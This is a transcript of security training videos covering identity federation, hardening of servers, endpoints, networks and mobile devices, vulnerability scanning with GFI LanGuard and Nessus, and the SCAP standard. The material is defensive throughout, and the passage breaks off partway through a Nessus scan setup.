Claims are assertions that are consumed by apps. So an example might be a date of birth, the department a
device resides in, a user's e-mail address, and so on. The identity provider is also often referred to as a claims
provider as a result of this. This is often used for Web Single Sign-On – SSO – for internal or public cloud
applications so that users don't have to keep providing the same credentials even though they are connecting to
different apps.
There are many benefits to using identity federation, including a reduced cost because we have a single central
identity store, reduced complexity for the same reasons, enhanced security because we're using digitally signed
tokens, or accountability because we have a central definable point where we need to track user account
activity.
It also facilitates on-premises to cloud resource access as well as business-to-business resource access. Let's
take a look at the communication flow with identity federation. Pictured in our diagram in the center we've got
a user station with a web browser. On the left, we've got the identity provider, otherwise called the claims
provider. And, on the right, we've got the web applications, which are otherwise called relying parties.
In transmission number one, the user in their web browser attempts to connect to a web application. Now the
web application is going to be configured to trust the identity provider. So, in transmission number two, the
web application will send back a notification to the user essentially redirecting them to the identity provider.
Now that might come in many different forms, including an HTTP redirect.
So, in transmission number three, the user web browser then – for example – uses that HTTP redirect to
connect to the identity provider where the user is then prompted to provide credentials. So, assuming the user
provides the correct credentials in transmission four from the identity provider, we would have a digitally
signed token that might contain claims – if it's configured for that – that gets sent back to the user station.
Now that could come in many forms, including web browser cookie. So now we would have a cookie –
essentially a signed security session token – that is in the possession of the user on their station. So
transmission number five would be the user station web browser sending that token – which could be a cookie
to the application – which authorizes the user to use the application.
Now, on a large scale with many web applications, this model makes a lot of sense and makes things much
easier over the long term. Common identity federation standards include OAuth – this is the open standard for
authorization – and it gives us the ability to sign in to a third-party web site after signing in to something – like
Google – only once.
SAML is the Security Assertion Markup Language. Common identity federation products include Microsoft
Active Directory Federation Services, which is usually called ADFS; Shibboleth, which is an open source SSO
solution; and OpenID, which is Internet SSO or Single Sign-On where you authenticate once to OpenID and
you are authorized from there for multiple web sites.
Table of Contents
Objectives
[Topic title: Server Vulnerabilities. The presenter is Dan Lachance.] In this video, we'll talk about server
vulnerabilities. Servers are highly sought after by malicious users. Because, if a server exists, presumably there
are multiple people that want to connect to some kind of service that has value on it or data that resides on that
host. Servers could be physical, they could be virtual, or we could have a virtualization server – otherwise
called a hypervisor – which is a physical server that runs virtual machine guests.
We have to consider the various platforms that our server operating systems might be running. For instance,
we might be securing our Windows platform, UNIX or Linux or maybe even a MAC OS X Server. Either way,
there are best practices and guidelines that we can follow in hardening each of those various operating systems.
We then must consider the roles each server plays because different roles will have different vulnerabilities.
So – for instance – with a file server, we have to think about the type of data that will be stored on the file
server and perhaps, for instance, it might be required that we enable multifactor authentication to safeguard
that data – maybe it's financial transaction information or maybe it's personally identifiable information. We
might even categorize the data on the file server and add more metadata to further control resource access.
In the case of a web server, we really are talking about a host supporting HTTP or HTTPS. Now, with an
application server, we're really looking at a web server that has a specific business use. So web server and
application server are similar, but the application server is more tailored to a specific business need. Now, of
course, what we want to do is make sure we're using SSL or TLS to remove any possibility of clear text
transmissions being captured by malicious user.
DNS servers are crucial because they are a name lookup service. However, we want to make sure that DNS
servers are properly hardened so that malicious users can't poison DNS with fake entries, which would redirect
users potentially to fraudulent sites. DHCP servers should also be hardened so that their configurations cannot
be changed. But another interesting aspect of DHCP is the prevention of rogue DHCP servers on the network
that can hand out incorrect IP address into clients.
For that, we are looking at network access control. We have to think about our identity provider – such as
Microsoft Active Directory – to make sure that it can't be compromised since it contains credentials. And, of
course, we might take a look at a PKI server that hosts a Certificate Authority that is used to issue certificates.
So the point then is that there are different considerations when hardening different server roles.
The other thing to consider also is if these roles are collocated on a single server that could be bad or good.
Ideally, we have single use servers that makes it easier to configure, manage, and harden. Hardening means we
are increasing security. This is done through numerous methods such as applying firmware updates; patching
the server operating system; and disabling unnecessary services, apps, user accounts, and even computer
accounts.
Server hardening also includes things such as making sure that you're running an up-to-date malware scanner
and using a host based firewall that denies all inbound and outbound traffic by default. So, in other words, we
add exceptions for what should be allowed into servers or traffic that should be allowed to leave. We shall also
have log forwarding configured to a centralized and secured logging host elsewhere. So that, if a server is
compromised, the logs can be white and we still have a way to track what happened.
We should also enable appropriate auditing. Now what this means is making sure we don't go overboard and
turn on auditing for every action for every user because they're more overwhelmed with useless information.
So, with auditing, we want to make sure we're very selective about who and what we audit. For servers that
support it, we should also consider disabling the server GUI. And instead we should manage servers remotely
either using GUI tools or locally or remotely using command line tools.
Depending on the operating system your server is running, you should be following the appropriate operating
system and app configuration best practices. You should change default settings. For example, instead of
leaving the default Windows administrator account, you might rename it to something else. Encryption should
always be used. Not just out on the Internet, but internally as well for data in transit, as well as data at rest.
We should always make sure we're using strong passwords or multifactor authentication. And we should
certainly disable the use of null passwords. That's never a good idea. We should also force periodic password
changes. Up-to-date server disaster recovery plans are absolutely invaluable because they include step-by-step
procedures for things like bare metal restore of failed servers. But this only works properly if each and every
IT technician knows their role in the disaster recovery plan.
We should also establish a baseline of normal server usage for every server. And, of course, this can be
automated overtime. We need to know what normal usage is on a given server in a given network environment
so that we can identify anomalies. And we might detect those by using a host-based intrusion prevention
system – otherwise called HIPS. So this would be configured specifically for our environment to detect, notify,
and stop suspicious activity.
Finally, at the physical level, we can't forget about securing our servers this way. So we might do this by
configuring things such as a power-on password that must be known when the server is powered up or a
CMOS password. And we also want to make sure that servers are always locked in a server room or in their
data center racks. We want to make sure that the data center racks have enclosures that lock as well. So we
don't want easy access to servers or the disk arrays that the servers use.
[Topic title: Endpoint Vulnerabilities. The presenter is Dan Lachance.] In this video, I'll talk about endpoint
vulnerabilities. When we talk about endpoint devices, we're really talking about two categories of devices.
We're talking about user devices like smartphones and laptops, but then at the same time we're also talking
about network infrastructure devices. Either way, depending on the type of solution we have – it might be
hardware or it might be software – we need to make sure we apply firmware updates or software patches to fix
any security issues.
This would apply to network infrastructure devices like network switches, VPN appliances, load balancers,
reverse proxies, network firewalls, Wi-Fi access points, servers, and network printers. For example, if we're
using wireless routers, it's important that we keep up to date with the latest firmware revisions in case they
address security vulnerabilities.
Endpoint devices, as mentioned, also include user based appliances or smartphones or laptops and so on. So, in
the same way, we should make sure that we apply firmware updates and software patches to user based
endpoint devices. We should also limit the user's ability to change configurations and to install software, which
includes drivers as well as apps from mobile device app stores and whatnot. Now we should limit that on all
types of user based endpoint devices like desktops, laptops, tablets, and smartphones.
A demilitarized zone is the network segment where we place publicly visible servers that need to be visible
that way. So that would include things potentially like public web sites, but it can also include web sites or
FTP servers that are used only by employees. Now a good argument could be made to say both of those should
not really be publicly accessible if it's for employees that are working from home or traveling, maybe instead
they should only be available after the employee establishes a VPN connection and that's a good argument.
So certainly we might place a VPN appliance within the demilitarized zone. So then we should also consider
the placement of a reverse proxy that listens for connections to various servers hosted elsewhere. That is also
another prime candidate for a DMZ or demilitarized zone. Strict firewall rules need to exist between the
Internet firewall and the DMZ itself.
For example, if we've got a reverse proxy listening on port 80 for a web server elsewhere, then that firewall –
between the DMZ and the Internet – should allow inbound port 80 traffic destined specifically to the reverse
proxy since it's listening for that connection. Now, in the same way, we should have a second layer firewall
with rules that controls traffic into and out of the DMZ and the internal network.
So, to continue our example with the reverse proxy listening on TCP port 80 for a web app, then maybe our
second level firewall would allow port 80 traffic. At least that's the source port destined for an internal web
server port hosted elsewhere. We should also consider the use of varying firewall products. Now why is that?
Well, generally using a variety of different types of products increases security. Because, if a malicious user
were to compromise one type of router or firewall because they have exploited a known vulnerability, that
same hack will not work on a different firewall product from a different vendor. Now, at the same time, it's a
double-edged sword, isn't it? Because it increases administrative effort.
Now you've got a track, you know, updates for firmware or perhaps software for different products. You've got
different configurations, different troubleshooting techniques, and so on. We should consider the use of
centralized RADIUS authentication servers. So endpoint network infrastructure devices should never perform
their own authentication. So we really refer here to things like VPN appliances, wireless routers, they should
not actually do the authentication.
These devices are called RADIUS clients. So a RADIUS client isn't an end user on a smartphone trying to
connect to Wi-Fi. That user would be called a supplicant. So the RADIUS client in that example would be the
wireless router. Now the problem here potentially...if things like wireless routers were to do actual
authentication, if it were compromised, then it would reveal credentials. So, instead, authentication should be
forwarded from RADIUS clients to a RADIUS server.
RADIUS clients will authenticate to the RADIUS server using a shared secret that gets configured. So,
naturally to harden that, we should be using a strong shared secret over an encrypted connection. Logging is
crucial to track activity, especially after some kind of an intrusion. So, therefore, we should configure log
forwarding for endpoint network infrastructure devices so that the logs are sent elsewhere.
So, if the device is compromised, we still have a record of what occurred. Now we might configure Windows
event log subscriptions. Here, in Server 2012 R2, I'm going to go ahead and click on my Start menu in the
bottom left. I'm going to type event and I'm going to start the Windows Event Viewer tool where log
information is stored. [The Event Viewer window opens. It is divided into three sections. The left section
contains the Event Viewer (Local) node, which further includes the Subscriptions option. The section in the
middle is the content section. The section on the right is titled Actions.]
Over on the left, I'm going to click on Subscriptions where I will right-click on it and then choose Create
Subscription. [The Subscription Properties dialog box opens.] I'm going to call this Sub1. [He types this in the
Subscription name text box.] Windows subscriptions that we're configuring as of right now are used for log
forwarding for centralized logging in Windows. What I'm going to do is leave this on collector initiated. [He
points to the Collector initiated radio button under the Subscription type and source computers section.] This
server will be the collector that will periodically reach out to other hosts on the network to collect log
information.
Of course, I could click the Select Computers button in order to specify those computers that I want to gather
log information from. Down below for events to collect, I would open the drop-down list and Edit the
events. [The Query Filter dialog box opens, which includes the Event level section and Event logs drop-down
list box.] And what I might do, for instance, is say I want to collect Critical, Warning, and Error
messages. [These are some of the checkboxes in the Event level section.] Specifically, let's say from the
Windows system log. [He selects the System option in the Event logs drop-down list box.] And then after that,
I would click OK.
Now what I must do in order for this to work is enable the WinRM or Windows Remote Management service
on target computers I want to collect log information from. Now, after I've done all of this, this machine will
periodically approximately every 15 minutes pull the configured computers that will have selected so that the
log information is stored here centrally.
We can do the same kind of thing with UNIX and Linux systems using the syslog daemon for log forwarding.
The idea is that a compromised device and its logs are absolutely meaningless because they could have been
changed or wiped by an attacker. So centralized logging to a host should be hardened so the host itself should
be hardened and it should also exist on a secured internal network.
For endpoint vulnerabilities, we should also have some kind of host intrusion detection and prevention system
in place. Now we might also do it at the network level. So a host intrusion detection and prevention system is
designed to look at things that are specific to a host, like application logs. Also it has the ability to decrypt
information that arrives at the host.
Network intrusion, detection, and prevention are designed to look at network traffic for multiple hosts. But,
depending on its configuration, it may not be able to look into the details of encrypted network traffic like a
host system could. And, of course, it's always important to encrypt data transmissions and data at rest both on
internal networks and externally on the Internet.
Objectives
[Topic title: Network Vulnerabilities. The presenter is Dan Lachance.] In this video, I'll talk about network
vulnerabilities. The goal with network security is to allow only legitimate access to the network. Most attacks
tend to occur from inside the network. So we don't often have malicious users trying to hack in directly from
the outside. Instead, malicious users can get network access and wreak havoc in a number of ways, including
an infected USB thumb drive that user brings into the network or users opening file attachments or clicking
links that trigger malware. Even drive by web site infections can occur where a user is simply viewing a web
site without even clicking anything.
So we need to consider all network entry points just like we would consider entry and exit points for physical
building security. This includes network switches and their wall jacks that devices plug into. So we should
always disable unused switch ports. And, for those that will be active, we should configure MAC filtering. So
only certain MAC addresses are allowed to be plugged into certain switch ports.
Now, of course, MAC addresses can be spoofed, but this is yet another layer in our security defense. VPN
appliances should always be configured to use multifactor authentication or MFA. This is considered much
more secure and more difficult to crack than standard username and password authentication. Wireless access
points should be configured to use centralized RADIUS authentication as opposed to a preshared key
configured on the device directly.
IEEE 802.1X plays an important role with network security. This is a security standard that hardware and
software can be compliant with. So it applies to wired and wireless network access. The idea is that users and
devices need to be properly authenticated before being allowed on the network. So, this means even before
DHCP would give in IP configuration to a device, it would have to successfully authenticate first.
You may wonder how that's possible. How could it forward an authentication request to a central server
elsewhere if it doesn't even have an IP? It doesn't do it. It's the connecting device like the network switch or the
wireless router that does it. So, therefore, the actual connecting device doesn't actually need to have a valid IP
configuration for this to work.
IEEE 802.1X devices include things like network switches, routers, VPN appliances, and wireless access
points. There is also the physical network access side of things that we want to make sure that we don't forget
about. So, as we've mentioned, we should be disabling unused wall jacks which in the end connect to switch
ports. We should control access to wall jacks even beyond MAC address filtering. So, therefore, wall jacks
should only be available within a secured building or a floor with restricted access or even behind locked doors
in certain parts of the building. That in conjunction with disabling new switch ports and MAC filtering adds to
our layered security defenses. Also wiring closets must always be behind locked doors to prevent things like
wiretapping or rerouting network connections by plugging things into different locations or even plugging in
devices like rogue wireless access points.
On the Wi-Fi side of things, there are a number of things we can do to harden or secure that environment. The
first is user awareness regarding things like rogue access points. Rogue access point is simply a Wi-Fi access
point that isn't authorized to be on the network. So a malicious user could have a rogue wireless access point
that looks legitimate that users connect to. So now the malicious user is seeing all of the user traffic.
We should always apply firmware patches to our Wi-Fi routers. We should also consider disabling remote
Internet administration. We should use HTTPS administration. We should consider disabling the broadcast of
the wireless network name or the SSID. And even though MAC addresses can be spoofed, we should still
enable MAC address filtering.
Our wireless routers, of course, should never do their own authentication, instead they should forward it to a
centralized RADIUS server. And we might even consider the use of a shielded location for Wi-Fi to prevent
the radio signals from emanating beyond a specific area. Rogue network services, as we've mentioned, include
things like Wi-Fi access points and DHCP server that can cause problems on the network.
A rogue DHCP server, for instance, could even be considered a denial-of-service attack if a malicious user gets
it on the network because it might give a bogus IP information to devices so that they can't connect to anything
legitimate. Then there are misconfigurations for things like network access control lists or ACLs. These are
often called packet filtering rules.
Essentially, we want to make sure that they are set to deny all traffic by default. And so then you should make
allowances only for what is required beyond this default configuration. ARP cache poisoning is another danger
if a malicious user gets on the network. In that they could essentially spoof the default gateway or router as
being themselves so that all traffic would be forwarded through the malicious user device.
Denial-of-service attacks, as we've mentioned, come in many forms and it could include network broadcast
storms or as we've mentioned a rogue DHCP server. A distributed denial-of-service attack is a little bit
different. In that, there are multiple computers involved in the attack, such as flooding a victim host or network
with useless traffic. So, therefore, we should be using network intrusion detection and prevention systems to
detect anomalies, log and notify and ideally – with the prevention system – stop the activity from continuing if
it's suspicious.
We should encrypt all transmissions including internally on our local area networks. Now, to do that, you're
probably not going to go through configuring PKI certificates for every app. It's too much work. Instead, you
might use something like IPSec, which can apply to all traffic regardless of higher-level protocol. We should
always harden all devices on the network including things like user smartphones because a single
compromised smartphone could compromise the entire network.
We should have periodic network penetration testing because we can learn a lot from this about weaknesses we
might not realize were there and that were exploitable. Ideally, this can be done by a third party. However, we
could also have internal penetration tests conducted by our own IT teams. Periodic network vulnerability
assessments should also be conducted – again either internally or third party.
The difference between it and a pen test is that the pen test actually exploits weaknesses it finds. The
vulnerability assessment does not. It just reports on it. And the biggest single most important factor here is user
awareness and training of things like social engineering or trickery. All of the hardening that we've discussed is
pretty much useless if users irresponsibly open file attachments in messages that look suspicious that they were
not expecting or click links on all kinds of web sites they should not be visiting.
Objectives
[Topic title: Mobile Device Vulnerabilities. The presenter is Dan Lachance.] In this video, I'll talk about
mobile device vulnerabilities. These days, mobile devices are ubiquitous, everybody's got one. Whether it's for
personal use, business use, or a little bit of both. The thing is that we need to treat mobile devices, like
smartphones, as full-fledged computers. They're exposed to numerous networks all the time and as a result,
there's a high possibility of infection or some kind of compromise. For example, if a user is using their
smartphone on a public WiFi network, and they do that quite often, possibility exists that their machine could
be compromised or infected on that network. So when they connect to a corporate network with that device,
problems could ensue. The other issue with mobile devices is that they're small and compact, and so therefore,
they're easily lost or stolen. So if they contain sensitive data, or if they contain apps that allow access to
sensitive data, there is a possibility of data leakage. We have to think about the storage on mobile devices. The
storage of items such as SMS text messages, cached e-mail messages, the internal storage or SD cards that
might contain sensitive data. Stored credentials, or even, for instance, PKI certificates that might be required
for a smartphone to authenticate to a VPN appliance. Then there's the issue of the apps running on the mobile
device. Even trusted app stores, in some cases, have proven to even host malware in the apps that are certified
to exist in those app stores.
So we're talking about even the big, popular app stores like Google Play for Android devices, the Microsoft
app store, the Apple iTunes app store. We need to be very careful, in terms of which apps are allowed to be
installed on mobile devices. Corporations will often use app sideloading if they've got custom developed
mobile apps. All that this means is that we've got the source files for the app and we're installing it or pushing
it out to the smartphone, for instance. Much like you'd push out an installation over the network to desktop
computers. So it's important, then, that we have policies that control the use or installation of certain types of
apps on mobile devices. Mobile devices can be logically partitioned or containerized. What this means, then, is
for BYOD, for bring your own device type of smartphones, where people bring their own personal phones and
use them for corporate use, we might have a personal partition containing personal app settings and data. And
likewise, we would also have a corporate partition on that same device containing corporate app settings and
data.
The beauty here is that we now have a way to selectively wipe corporate data, and apps and settings, from the
phone without affecting personal data in the personal partition. A mobile device management, or MDM
enterprise class solution, lets you apply policies to mobile devices to control them. So, to control things like
whether Bluetooth is enabled or not, whether the camera is enabled, SD card encryption being enforced,
preventing access to app stores. Even preventing data leakage between personal and corporate device
partitions. As an example, consider Microsoft's System Center Configuration Manager, or SCCM, which does
have some mobile device management options. [The System Center Configuration Manager window is
displayed. This window is divided into four sections.] Here in the left hand workspace area at the bottom left,
I've clicked on Assets and Compliance. And in the left hand navigator, I've gone under Compliance Settings,
where I've clicked on Configuration Items. I'm gonna right-click and create a new configuration item,
specifically for mobile devices. [The Create Configuration Item Wizard opens. The first page is titled General.
He selects the Mobile device option in the Specify the type of configuration item that you want to create drop-
down list box.] And I'm going to call this Policy1. Now what I'm going to do here is set some policy settings
that control the behavior of mobile devices. So I'm going to click Next. [The next page is titled Mobile Device
Settings.] Now, what I could do is selectively choose different categories of settings, such as lets see Cloud
usage on the mobile device, Roaming options, Encryption options, even Password options. [These are some of
the checkboxes under the Mobile device setting groups section.] So I'm going to go ahead and do that, and then
I'll click Next. [The next page is titled Password.] Here we can see we've got password options related to the
mobile device. Also the number of idle time, in terms of minutes before the device is locked, so we can specify
that here. Password complexity settings. Also, as I continue through the wizard, [The next page is titled
Cloud.] I've got options as to whether or not Cloud backup is allowed, whether photos are allowed to be
synchronized.
And as I progress through here, by clicking Next, I've also got roaming options. [The next page is titled
Roaming.] And if I go Next again, here I've got the encryption options that I asked for initially when starting
this wizard. [The next page is titled Encryption.] For example, we might want to make sure that we enable
Storage card encryption by turning it On. You'll notice too, that most mobile device management solutions will
have an auto remediation option. Here we see that in the bottom left with a check mark labeled Remediate
noncompliant settings. So mobile devices that don't meet these settings, we would be turning them on. As
always, let's not forget that mobile devices have firmware. And sometimes there are firmware revisions that
can address security vulnerabilities. So we need to make sure we've got the latest firmware updates on our
mobile devices. Every mobile device is a full-fledged computer, really, so it should have an up to date malware
scanner, ideally with centralized notification of infections. A mobile device firewall, in other words a host
based firewall, should also be configured to prevent externally initiated connections to the mobile device. In
this video, we talked about mobile device vulnerabilities.
[Topic title: Vulnerability Scanning Overview. The presenter is Dan Lachance.] In this video, I'll do an
overview of vulnerability scanning.
Vulnerability scanning begins with identification of assets that have value to the organization. That could be in
the form of sensitive data, or specific business processes, or certain ingredients used to come up with a magic
mixture in the food industry and so on. After the assets have been identified, they then need to be prioritized
along with the likelihood of threats against those assets. We also have to weigh in what the organization's
appetite for risk is. Next, we can actually conduct a vulnerability assessment. This might be conducted by
internal IT staff or IT techies from a third party firm. Or it could also be conducted by a malicious black hat
user, that's performing recognizance scans. What should be scanned with a vulnerability scanning session?
Well it depends on what it is you want to test for weaknesses. To identify weaknesses, you might be interested
in scanning the entire network. You might scan a single device on the network, or all devices on the network.
Maybe only certain types of devices have your interest. Maybe systems that are running Windows operating
systems are the only things you want to look for weaknesses on. You might also scan applications looking for
vulnerabilities, so all applications or specific applications. So when we start configuring our vulnerability scan,
we configure the scope. And that scope might be an entire network, a specific subnet, an IP address range, and
so on. [The GFI LanGuard 2014 window is open, which includes the Dashboard and Scan tabs.] Here I've got
a trial Version GFI LanGuard 2014. And here under the Scan area, I have the option of determining my scan
target, which defaults to localhost. Now, if I go ahead and click on the ellipsis button over on the right, that's
the button with three dots, [The Custom target properties dialog box opens. It includes the Add any computer
that satisfies one of the following rules section, which further includes the Add new rule link.] here I can add a
rule for computers that must meet certain conditions in order for them to be scanned. [He clicks the Add new
rule link and the Add new rule dialog box opens.]
So it could be based on computer names, I could maybe import a file that has computer names in it. Or a
specific domain name for Active Directory, an IP address range, even an organizational unit within Active
Directory. [These are some of the options under the Rule type drop-down list box.] So the idea is that we can
give it a scope of what it is we want to scan. Other considerations when configuring the scan settings are
whether or not you're going to conduct a credentialed or a non-credentialed scan. So this means that we either
give it credentials, so for example, perhaps we want to use the administrative credentials or the root credentials
and try to look for weaknesses. Or we might want to mimic an attacker that really doesn't know anything about
the environment, and we might want to conduct a non-credentialed scan. We can also run a manual or a
scheduled scan. Ideally, you should have scans scheduled to run automatically on a periodic basis, because
threats are ever changing. And so if we only conduct a vulnerability assessment scan once per quarter, once per
year, we might miss out on threats that are actually infiltrating our network. When you're configuring a
vulnerability scan, you'll always have an option where you can specify a specific set of credentials that you
want to use to conduct the scan. [He points to the Credentials drop-down list box under the Scan tabbed page
of the GFI LanGuard 2014 window.] Of course, you could also not specify any credentials, you could conduct,
in this case, a null session scan. But at the same time, if I were to go in this specific tool under the
Configuration menu, over on the left I'd see that I could also configure Scheduled Scans. [He right-clicks the
Scheduled Scans option under the Configuration section in the Configuration tabbed page and selects the New
scheduled scan option. As a result, the New scheduled scan wizard opens.] So that we're keeping up to date
with any weaknesses that might have not been apparent before, but things change. So running these scans
periodically is always a very important consideration. Scans can be run on the server, where the server reaches
out on its own and discovers devices on the network and how they're configured, and applications, and so on.
And depending on whether you run a credentialed versus non-credentialed scan will determine how in-depth
the returned information really is. There is also agent-based scanning, where we must install a software agent
on given devices on the network that can provide more scanned information.
Or we might install agents on machines on the edge of a network that our permanent existing server-based
scanning can't reach. Most vulnerability scanners will have some kind of auto-remediation capabilities, even if
it's simply turning off options that are deemed insecure or applying updates that are missing. The results of a
scan will identify weaknesses but will not exploit them like a penetration test would. So there's not as much
risk for disruption of production systems when you conduct a vulnerability scan as there would be when you
would conduct a penetration test. So the results also allow us to improve or replace existing security controls.
So as we've seen, a vulnerability scan then is non-invasive. Discovered vulnerabilities are not exploited like
they are with pen tests. We should enable scheduled continuous monitoring of critical IT systems, in terms of
for their availability, for malware infections, even things like denial of service attacks. And that starts to fall
into that gray area of getting into intrusion detection and prevention systems.
The items that would be checked in a standard vulnerability scan would include things like open ports, which
tells us what services are viewable or reachable on the host. Any malware that might have been detected,
missing service packs, default operating system, and app configurations that could present security
vulnerabilities, as well as insecure configurations. Also, we might configure compliance with preconfigured
security baselines. So for example, here we've got a scan that's been conducted on a host running Windows
Server 2012 R2 64-bit. [He points to the Saved Scan Result node under the Scan Results Overview section of
the Scan tabbed page.] And we can see there are a few high security vulnerabilities. And if we click them, [He
clicks the High Security Vulnerabilities subnode and its content is displayed in the adjacent section named
Scan Result Details.] and then over on the right, expand the categories for Miscellaneous, we see that
AutoRun is enabled, that's a security risk. Under Software we've also got some information here talking about
a router or a firewall configuration, allowing source routing packets. And then we can take a look at other
vulnerabilities that are listed here. Here they're classified as low security vulnerabilities or high. And then
there's potential vulnerabilities, missing service packs. So all of these things are normally configurable when
we scan for weaknesses, either on a network, on a device, for an app, and so on. Whichever tool you happen to
use for vulnerability scanning, it's always important to make sure it's got an up to date vulnerability scanning
database, so it knows what to look for. Common vulnerability scanning tools include Open VAS, Nessus,
Microsoft Baseline Security Analyzer, Nexpose and Qualys FreeScan.
[Video description begins] Topic title: Vulnerability Scanning Settings. The presenter is Dan
Lachance. [Video description ends]
In this video, I'll demonstrate some common vulnerability scanning settings. Now there are plenty of
vulnerability scanning tools,
[Video description begins] The Configuration tabbed page of the GFI LanGuard 2014 window is open. [Video
description ends]
but there are many settings that they all have in common. For example, over here on the left I have a series of
scanning profiles that can be used when I conduct different types of scans. So, for instance, if I were to choose
complete and combination scans,
[Video description begins] He selects the Complete/Combination Scans subnode in the Configurations section
and its content is displayed in the content section. [Video description ends]
I've got full vulnerability assessment as a profile, which I can edit, by the way. And when I click Edit this
profile, I can determine exactly what is being done when that type of scanning profile is used to conduct a
scan.
[Video description begins] The GFI LanGuard 2014 Scanning Profiles Editor dialog box opens. [Video
description ends]
So depending on your tool, you'll have hundreds upon hundreds of items that get checked, and of course, you
can customize by removing check marks or by adding items. However, I'm going to leave that alone. Also, if I
were to click, for example, Network & Software Audit on the left, these are other types of scanning
profiles. I can see I've got profiles here for
[Video description begins] He selects the Network & Software Audit subnode in the Configurations
section. [Video description ends]
scanning for Trojan Ports, a generic Port Scanner, Software Audit, TCP & UDP Scans, and so on. Now of
course we've got scheduled scanning options if you want this to happen on an automated basis. But in this tool,
GFI LanGuard 2014, if I go to the Scan tab, then I can determine exactly what it is I want to scan. The scan
target is currently set to the localhost.
[Video description begins] He points to the Scan Target drop-down list box under the Launch a New Scan
section in the Scan tabbed page. [Video description ends]
However if I click the ellipsis button, the button with the three dots over to the right, here I can click the Add
new rule link. And for
[Video description begins] The Custom target properties dialog box opens. It includes the Add any computer
that satisfies one of the following rules section, which further includes the Add new rule link. The Add new rule
dialog box opens. [Video description ends]
[Video description begins] He selects the IP address range is option in the Rule type drop-down list
box. [Video description ends]
[Video description begins] He points to the From and To text boxes under the Scan an IP address range radio
button. [Video description ends]
However, I could specify whatever it is that I wish depending on what it is that I want to scan. So, I'm just
going to change the addresses a little bit,
[Video description begins] He enters 192.168.1.1 in the From text box and 192.168.1.254 in the To text
box. [Video description ends]
and I'm going to click OK. And I'll click OK again, and now we can see it's filled in a custom range of IP
addresses based on the custom group settings. You see the name that's listed here. Now I can
[Video description begins] He points to the Scan Target drop-down list box. [Video description ends]
determine whether I want to use any of those profiles that we looked at for conducting my vulnerability scan.
Do I want to do a full scan, or just a TCP and UDP scan? Maybe all I want to do is look at last month's
patches. So I've got profiles for that or only missing patches and so on. So I'm going to leave it on full scan.
[Video description begins] These are some of the options in the Profile drop-down list box under the Launch a
New Scan section. [Video description ends]
I can tell it here which credentials that I wish to use, so I've filled in some alternative credentials that should
work on most devices on my network.
[Video description begins] He points to the Credentials drop-down list box under the Launch a New Scan
section. [Video description ends]
So I've use the administrator username and the appropriate password. I can also click Scan Options here to
determine whether I want to wake up
[Video description begins] He clicks the Scan Options link in the Launch a New Scan section and the Scan
Options dialog box opens. [Video description ends]
computers that are offline or shut them down when the scan is complete. So at this point, I'm ready to start my
scan.
[Video description begins] He points to the Wake up offline computers and Shut down computers after scan
checkboxes under the Power saving options section. [Video description ends]
I'm going to go ahead and click the Scan button over on the right. So we can now see that the scan has begun,
and we're starting to see in the left-hand window the first host that it found on the network with an address of
192.168.1.1. Now,
[Video description begins] He points to the result in the Scan Results Overview section. [Video description
ends]
it says that the estimated scan time remaining is approximately six hours. So depending on the speed of your
network, the type of scanning profile, and how many hosts you're scanning will really determine exactly how
long it takes. In this video, we learned how to configure vulnerability scanning settings.
Objectives
explain how the SCAP standard is used to measure vulnerability issues and compliance
[Topic title: SCAP. The presenter is Dan Lachance.] In this video, I'll talk about SCAP. SCAP is a NIST set of
specifications related to enterprise security that has a focus on Automation and Standardization.
It stands for Security Content Automation Protocol. And it can do things like verify that patches have been
installed correctly. It can check security configurations. It can scan for signs of security breaches. It can also be
used for forensic data gathering. SCAP addresses the difficulties that larger enterprises encounter in terms of
the large number of systems that need to be secured. Especially when there are a wide of variety of different
types of systems in use. Or different versions of operating systems, different versions of applications, even
using different security monitoring, management, and scanning tools. SCAP enumeration checks a specific set
of identifiers that are a standard. It looks for software flaws, insecure configurations, and also known
vulnerable products that might be installed on a host. NIST offers SCAP accreditation for products through the
SCAP validation program.
The big part of SCAP is really dealing with automation, automated monitoring of systems. Even in a real time
situation, looking for suspicious activity, and also to look for things like misconfigurations and missing
patches. Also notifications are part of SCAP. And in some cases solutions can autoremediate noncompliant
configurations. SCAP can also be used as a vulnerability assessment tool, since it can identify problems with
configurations related to an operating system or a specific application even. SCAP reports can identify security
vulnerabilities and insecure configurations. Some examples of NIST validated SCAP tools include IBM
BigFix Compliance, Nexpose. SCAP extensions for Microsoft System Center Configuration Manager or
SCCM. Qualys SCAP Auditor, the SAINT Security Suite, and finally, OpenSCAP. In this video, we talked
about SCAP.
Objectives
[Topic title: Scan for Vulnerabilities using Nessus. The presenter is Dan Lachance.] In this video, I'll
demonstrate how to conduct a vulnerability scan using Nessus.
[The Download Nessus page of the tenable.com web site is open.] Nessus is a widely used vulnerability
scanning tool that runs on different platforms. But if you're using Kali Linux which already contains many
security tools, you'll notice that Nessus isn't included. But that's no problem, we can easily go to the
tenable.com web site where we can download the Nessus tool. So as I scroll down on that page, I can select
Windows, Mac OS X, Linux or FreeBSD. So because I'm going to be running Nessus on Kali Linux, I'm going
to expand Linux, where I can download the 64 or 32-bit Debian package. Now at the same time, I can scroll
down even further and I can choose the Get an activation code button. [The presenter clicks this button and the
Obtain an Activation Code page opens.] Now, from here, I have the option of determining if I want to use
Nessus Home for free, which limits me to scanning 16 hosts. Or I could go with Nessus Professional by paying
a yearly fee. So if I wanted to go with the evaluation free version for home I would simply click Register Now.
Specify some email address information, it's completely free, and it would then email me my activation code.
Now once you've downloaded the installer, the Debian package, you can extract it here at the command line
using the d package command line tool with -i. And then you can actually install this package. [He highlights
the dpkg -i Nessus-6.8.1 -debian6_ad64.deb command in the root@kali command prompt window.] Now once
you've installed this, it tells you to start the Nessus daemon. And then it tells us to point our web browser to
https, whatever the host name is, port 8834. Let's switch back to the Kali Linux Iceweasel browser, and let's
actually connect to the Nessus config page. [He opens the Nessus Home / Scans web page. At the top of this
page are two tabs, Scans and Policies.] Now if you're prompted for credentials, specify the username and
password that would've created when you first initially configured Nessus. So I don't have any scans here, so
I'm going to go ahead and click the New Scan link over on the left, [He clicks the New Scan button and the
Scan Library subpage opens.] which gives me a list of templates.
Notice some of these templates, the ones that have the purple bar, require an upgrade. But there's still some
very powerful things I can evaluate here with the Nessus Home Edition. I'll start by clicking the Basic Network
Scan template. [The New Scan / Basic Network subpage opens. It is divided into two sections. The left section
is the navigation pane, which contains the BASIC, DISCOVERY, ASSESSMENT, REPORT, and ADVANCED
subsections. The BASIC subsection includes the General and Schedule options. The right section displays the
content of the option selected in the left section. The General option is selected by default and its content is
displayed, which includes the Name, Description, and Targets text boxes.] I'm going to call this new scan
